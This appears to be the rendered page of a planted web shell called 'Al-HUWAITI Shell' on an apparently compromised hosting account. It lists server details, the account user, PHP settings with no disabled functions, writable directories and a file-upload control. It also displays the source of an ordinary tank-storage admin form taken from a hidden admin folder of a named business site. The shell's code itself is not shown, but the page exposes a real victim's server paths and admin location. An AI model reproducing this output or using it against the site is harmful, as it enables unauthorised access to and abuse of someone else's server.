Al-HUWAITI Shell
Al-huwaiti


Server : LiteSpeed
System : Linux us-phx-web1202.main-hosting.eu 4.18.0-553.84.1.lve.el8.x86_64 #1 SMP Tue Nov 25 18:33:03 UTC 2025 x86_64
User : u615232177 ( 615232177)
PHP Version : 8.1.33
Disable Function : NONE
Directory :  /home/u615232177/domains/florencewaltersconsulting.com/public_html/admin7362/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/u615232177/domains/florencewaltersconsulting.com/public_html/admin7362/tank_storage.php
<?php session_start();
$page_name = basename($_SERVER['PHP_SELF']); 
include("headerstrict.php"); ?>
<?php $page_title = "Tank Storage"; $page_title_url = "tank_storage_"; ?>
<title><?php echo $company_name; ?> - <?= $page_title ?></title>
<!-- Body main section starts -->
<main>
    <div class="container-fluid">

        <div class="row m-1">
            <div class="col-12">
                <h4 class="main-title">Tank Storage</h4>
            </div>
        </div>

        <div class="row">
            <div class='col-8'>
                <form id='theForm' class="app-form rounded-control" enctype='multipart/form-data'>
                    <div class="floating-form mb-3">
                        <input class="form-control" type="date" name="date_of_issue" placeholder="Date of Issue" required>
                        <label class="form-label">Date of Issue</label>
                    </div>
                    <div class="floating-form mb-3">
                        <input class="form-control" type="text" name="tank_location" placeholder="Tank Location" required>
                        <label class="form-label">Tank Location</label>
                    </div>
                    <div class="floating-form mb-3">
                        <input class="form-control" type="text" name="product_name" placeholder="Product Name" required>
                        <label class="form-label">Product Name</label>
                    </div>
                    <div class="floating-form mb-3">
                        <input class="form-control" type="text" name="reference_no" placeholder="Reference No" required>
                        <label class="form-label">Reference No</label>
                    </div>
                    <div class="floating-form mb-3">
                        <input class="form-control" type="date" name="date_of_expiry" placeholder="Date of Expiry" required>
                        <label class="form-label">Date of Expiry</label>
                    </div>
                    <div class="floating-form mb-3">
                        <input class="form-control" type="text" name="tank_classification" placeholder="Tank Classification" required>
                        <label class="form-label">Tank Classification</label>
                    </div>
                    <div class="floating-form mb-3">
                        <input class="form-control" type="text" name="quantity" placeholder="Quantity" required>
                        <label class="form-label">Quantity </label>
                    </div>

                    <div class="form-floating mb-3">
                        <select name="status" class='form-control' id="">
                            <option value="">Choose Status</option>
                            <option value="Active">Active</option>
                            <option value="Inactive">Inactive</option>
                        </select>
                        <label class="form-label">Status</label>
                    </div>

                    <div class="form-floating mb-3">
                        <input class="form-control" type="file" name='fileField' required>
                        <label class="form-floating form-label">File</label>
                    </div>

                    <div>
                        <button type="submit" name="action" value="save" class="btn btn-light-primary">Save</button>
                    </div>
                </form>
            </div>

        </div>
        <hr>
        <div class="row mt-4 mb-4">
            <div class="col-12">
                <h4 class="main-title">Uploaded Items</h4>
            </div>
        </div>
        <div id="data" class='row blog-section'></div>

    </div>
</main>
<?php include("footer.php"); ?>
<link href="assets/vendor/summernote/summernote-bs5.css" rel="stylesheet">
<script src="assets/vendor/summernote/summernote-bs5.js"></script>
<script src="https://cdn.jsdelivr.net/gh/perevoshchikov/summernote-grid@1.0.0/summernote-grid.min.js"></script>
<script>
const pageTitleUrl = "<?= $page_title_url ?>";
const pageName = "<?= $page_name ?>";
</script>
<script src="script.js"></script>

Al-HUWAITI Shell